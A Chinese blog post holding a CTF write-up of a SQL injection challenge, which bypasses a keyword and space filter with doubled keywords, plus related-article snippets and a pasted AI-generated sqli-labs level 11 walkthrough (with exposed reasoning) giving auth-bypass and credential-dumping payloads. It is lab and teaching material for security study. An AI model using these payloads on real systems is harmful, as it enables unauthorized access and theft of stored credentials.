实验吧简单的sql注入解题思路

最新推荐文章于 2025-05-26 11:42:25 发布
最新推荐文章于 2025-05-26 11:42:25 发布
阅读量8.3k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
文章标签: select sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZweLL032/article/details/62901676
本文通过一个具体的CTF挑战题目,详细介绍了如何发现并利用SQL注入漏洞,从构造测试用例到成功获取FLAG的全过程。文章重点展示了面对过滤机制时,如何巧妙绕过并正确构造SQL语句。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

解题思路:研究了好久,看了writeup才知道
1)在文本框输入1,提交,链接变成id=1
2)在文件框输入1‘,提交,报错,判断存在注入。

3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。
4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag from flag where ‘t’=’t

执行后报错:heck the manual that corresponds to your MySQL server version for the right syntax to use near ‘flag flag ‘t’=’t” at line 1
分析:根据错误信息发现只有变量了,其他的关键字都被过滤了。
5)把关键字写2遍提交,发现如下报错: corresponds to your MySQL server version for the right syntax to use near ‘unionselectflag fromflag where’t’=’t” at line 1
分析:发现空格被过滤了
6))使用+号在空格之前连接:
http://ctf5.shiyanbar.com/423/web/?id=1 ‘+unionunion +selectselect +flag+fromfrom +flag+wherewhere+’t’=’t

得到KEY:flag{xxxxxx}

ZweLL032
关注
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
mysql注入fuzz字典_SQL注入常规Fuzz全记录
weixin_29230865的博客
01-21 1516
前言本篇文章是在做ctf bugku的一道sql 盲注的题(题目地址:注入题目)中运用了fuzz的思路,完整记录整个fuzz的过程,给师傅们当点心,方便大家加深对web sql注入 fuzz的理解。进入主题1.访问题目,是个典型的登录框2.尝试输入admin/123456,提示密码错误,因此可以确定存在用户admin,这里可能会有师傅要爆破了,但这里题目要求sql注入,我们就按照预期解来吧。3.我...
实验吧web之简单sql注入1
The Road Of Sec
05-06 8651
0x.部分题解 一、通过加英文单引号1‘ ,检测到存在注入:   php?id=1   二、按常规步骤输入1 and 1=1和1 and 1=2的时候,发现报了“SQLi deteced!”而无法查询:php?1 and 1=1  php?1 and 1=2       那么,去掉空格输入1and1=1和1and1=2呢?       确定是过滤了空格!
实验简单SQL注入1,简单SQL注入
weixin_30770783的博客
05-07 219
接上面一篇博客。 实验简单sql注入1 题目连接 http://ctf5.shiyanbar.com/423/web/ 同样,直接输入 1加个但引号,结果下面有返回错误, , 有错,所以估计这里应该是要闭合,字符行注入,但是这个标题,到底过滤了什么,目前我还不知道过滤了什么,所以先搞一下。。 输入 1' and 1=1# 按理...
干货|SQL注入思路总结(非常详细)零基础入门到精通,收藏这一篇就够了
yy1715713348的博客
05-26 1057
干货|SQL注入思路总结(非常详细)零基础入门到精通,收藏这一篇就够了
sql简单注入
weixin_51646864的博客
06-13 722
原理: 当我们在查询一些数据时,输入我们指定的查询内容后,后台会根据用户的输入来执行SQL语句查询,类似于SELECT * FROM xxx表 WHERE id=’’,而用户可以在id字段构造一些危险的查询语句。 简单union注入步骤: 这里以攻防世界的一个题目的模型进行注入。 1、判断注入漏洞: (1)and 1=1 / and 1=2 若回显页面不同则说明是整形注入,否则不是 (2)-1/+1 回显下一个或上一个页面说明是整形注入,否则不是 (3)单引号判断 ‘ 显示数据库错误信息或者页面回显不同,说
所谓最简单SQL注入
扯蛋的青春与蛋痛的生活
01-12 1980
今天没带眼镜,,所以不太想干活 也不知怎的, 对公司另一同事写的业务台模块来了兴趣..帮其"测试一下" 在VC的代码片段是 CString SqlText = "Select User_ID, Login_Name, Login_Pwd, Chinese_Name, Operation from A_Employee Where Login_Name = '" +
简单SQL注入(小白级)
m0_46625346的博客
05-18 501
简单SQL注入 1.找数据库名 http://IP地址/sqli-labs/Less-1/?id=11111111’ union select 1,group_concat(schema_name),3 from information_schema.schemata %23 //找数据库名 得到wfafaefawcaf 2.找表名 http://IP地址/sqli-labs/Less-1/?id=11111111’ union select 1,group_concat(table_name),3 f
实验吧三道sql注入题目解题思路以及当中至少点整理(简单SQL注入简单SQL注入2、简单SQL注入
xiaotaode2012的专栏
08-12 4162
0x00 最近学习CTF有一段时间了,下面将实验吧三题题目的简单SQL注入进行一定的整理, 0x01 简单sql注入 做题的地址为: http://ctf5.shiyanbar.com/423/web/ 第一步:随便输入个数字load下url:http://ctf5.shiyanbar.com/423/web/?id=1发现是这个,老套路,既然题目提示是过滤 我们来各种试试到底过滤了
第三届上海市大学生网络安全大赛 i春秋CTF Web解题思路
曹振国的博客
05-01 1279
SOME WORDS1.发现SQL注入2.尝试SQLMap3.经实验发现过滤了"="和"and"reverse()函数flag总结 1.发现SQL注入 ?id=1 有数据 ?id=2 有数据 ?id=2-1 有数据 2.尝试SQLMap 发现报错: 3.经实验发现过滤了"=“和"and” 发现页面会返回错误信息,尝试报错注入: 用到函数:updatexml updatexml(目标xml内容,xml文档路径,更新的内容) 查询库名 ?id=updatexml(1,concat(0x7e,
简单sql注入之一 (实验吧)
wewww111的博客
08-11 3886
1.判断注入类型 1' or '1' = '1 结果如下 测试几个简单的语句后, 1' order by 1 # , 1' select 1 # 根据报错信息 #  -- - order by select 等关键词都被过滤 关键词被过滤:解决方法如下 1大小写交替: Order SeLect  2.双写  : OderOrder SelectSelect  3.交叉: sele...
实验吧 | 简单sql注入之3
JacobTsang的博客
11-05 379
解题链接: http://ctf5.shiyanbar.com/web/index_3.php 题型: Get请求传参进行Sql注入 !!注意:利用 # 或 --+ 进行截断 模糊测试结果: 1)查询成功返回 Hello ,查询失败无回显。 2)查询id = 1 ,2 ,3均有回显。 开始注入: 1)先看一下有多少个字段吧! payload1 = http://ctf5.shiyanbar.com...
简单sql注入入门
d2231300271的博客
03-24 462
基本流程是:观察注入->判断参数类型-->判断列数(group by或order by)-->观察是否存在显示位(就是页面能够显示列数据的位置(实践理解)),语法报错,异常页面显示(根据不同情况选择不同的注入方式)-->根据不同的注入方式依次显示库,列,表。当前99%以上的MySQL版本都是5.0以上,都支information_schema 库(),所以我们会使用该库进行爆数据库-->爆数据表--爆数据列-->爆数据(类似于根据目录查页数然后翻到相对于的位置)字段表示的是数据库中所有的字段信息。
实验-简单SQL注入
wyj_1216 House
04-07 432
题目来源: http://ctf5.shiyanbar.com/423/web/ writeup 1、进入页面后,尝试输入1 发现注入点 2、尝试注入 首先尝试 ?id=1' 其次,尝试 ?id=1 and 1=1 发现,没有and,且,空格被+替代 知识点:可用/**/,()来替代 进行尝试(这里用/**/来代替空格),再次尝试注入 3、尝试爆数据库 4、尝试爆表名 发现...
简单SQL注入攻击
秋不溜秋的博客
08-02 1959
一、寻找目标 二、常见注入方法 三、SQL注入攻与防
实验-简单sql注入之3
苟有恒,必有三更眠,五更起。
08-07 273
实验-简单sql注入之3 原题链接 http://ctf5.shiyanbar.com/web/index_3.php 分析 提示说报错注入,但是发现updatexml,floor,extractvalue,都显示Don't exp函数任然可以,利用exp函数报错。 直接上payload: DB: ?id='or exp(~(Select * From...
实验简单sql注入之3WP
Yale的博客
03-19 1497
就上图不说话(sqlmap) 这种题目对于初学sqlmap的人还是很好玩的
记一次简单SQL注入
he320631127的博客
08-06 618
参考:http://103.238.227.13:10083/ bugku 可以看到编码是gb2312 测试注入点 id=1和id=1‘ 都没错 应该是宽字节注入,在试试 id=%df’ 报错 接着来 输入字段id=%df’ union select 1,2 %23 查看数据库的名 查看要找的key表里面的string ...
最最简单SQL手工注入教学,我奶奶都会
MachineGunJoe666
04-24 1993
这期教学是给小白学习的,大佬看看就好。 我们先打开靶场:【靶场】 我们先进去发现是一个很简单的页端。 我们先判断是否有注入。 我们先在链接后面添加: and 1=1 来判断是否有注入。 发现返回正常。 我们再在链接末尾输入:and 1=2 这里我们发现与之前and 1=1时的界面不一样了这就说明有注入。 (这里解释一下and 1=1是什么意思 其实很简单就是你问一个服务器1是不是=1 所以我们and 1=1 返回正常 and1=2就是问1是不是=2所以我们报错了)
sqllabs 11
最新发布
07-09
<think>我们正在处理关于SQL注入实验室(SQL Labs)第11关的查询。根据提供的引用,第11关是一个基于POST请求的注入点,通常涉及登录表单(如用户名和密码字段)。用户需要找到正确的SQL注入方法来绕过认证或提取信息。 关键点: - 第11关使用POST请求(与之前的GET请求不同)。 - 注入点可能在用户名或密码字段。 - 需要找到正确的闭合方式(根据引用,第11关是单引号闭合)。 解题步骤(根据引用[2]和[3]): 1. 测试注入点:在用户名或密码字段尝试注入。 2. 确定闭合方式:尝试使用单引号(')来闭合字符串,并添加注释符(#)来注释掉后续的SQL代码。 3. 验证注入:例如,在用户名处输入:`admin' and 1=1#`,密码任意。如果能够登录成功,则说明注入成功。 4. 进一步利用:使用联合注入(union select)来获取数据库信息。 具体步骤(参考引用[3]): 1. 寻找闭合方式:输入`1' or 1=1#`,如果登录成功,说明是单引号闭合。 2. 确定字段数:使用`order by`语句,例如输入`-1' order by 2#`(逐步增加数字直到报错),确定字段数为2。 3. 联合注入:使用`union select`来获取数据库信息,例如: - 爆当前数据库名:`-1' union select 1, database()#` - 爆表名、列名等(需要构造相应的查询)。 注意:在POST请求中,注入是通过表单提交的,所以需要在输入框中输入这些注入字符串。 实验环境: - SQL Labs是一个著名的SQL注入练习平台,通常通过搭建在本地或在线环境进行。 - 可以使用如XAMPP、WAMP等搭建PHP+MySQL环境,然后下载SQL Labs源码部署。 教程资源: - 可以参考网上的SQL注入教程,特别是针对SQL Labs的闯关指南。 - 引用[1][2][3][4]提供了部分解题思路,但更详细的步骤可能需要查阅专门的教程。 相关问题: 1. SQL注入的基本原理是什么? 2. 如何搭建SQL Labs实验环境? 3. 第11关与之前基于GET的注入关有什么不同? 4. 如何利用联合注入获取数据库中的敏感信息? 5. 除了联合注入,还有哪些方法可以用于第11关? 请根据上述信息编写回答。</think>### SQL Labs 第11关解题指南 #### **实验环境** 1. **基础环境**:需搭建PHP + MySQL环境(推荐XAMPP/WAMP),部署[sqli-labs](https://github.com/Audi-1/sqli-labs)源码。 2. **关卡特性**:第11关为**POST型注入**,模拟登录表单(用户名/密码字段),闭合方式为**单引号闭合**。 3. **工具准备**:浏览器(测试注入)、Burp Suite(抓包调试)、SQLMap(自动化检测)。 #### **解题步骤** 1. **确认注入点**(引用[2][3]): - 在用户名输入:`admin' and 1=1#`,密码任意(如`123`) - 若登录成功 → 存在SQL注入漏洞,闭合方式为单引号。 2. **判断字段数**(引用[3]): ```sql -1' order by 2# -- 正常 -1' order by 3# -- 报错 → 字段数为2 ``` 3. **联合注入获取数据**(引用[3][4]): ```sql -1' union select 1,database()# ``` - 输出当前数据库名(如`security`)。 - 爆表名:`-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#` - 爆列名:`-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#` 4. **提取敏感信息**: ```sql -1' union select group_concat(username),group_concat(password) from users# ``` - 获取所有用户名和密码(如`admin/dumb`)。 #### **关键技巧** - **闭合原理**:通过单引号`'`闭合字符串,`#`注释后续语句(如`... WHERE username='输入' AND password='...'` → 输入`admin'#` 使条件变为`username='admin'#`)。 - **绕过认证**:`' or 1=1#` 使查询恒真,直接登录[^3]。 - **错误利用**:若联合注入失败,尝试`' and updatexml(1,concat(0x7e,(SELECT database())),1)#` 报错注入[^4]。 #### **防御建议** - 使用参数化查询(PDO/prepared statements)。 - 过滤特殊字符(如`'`、`#`)。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值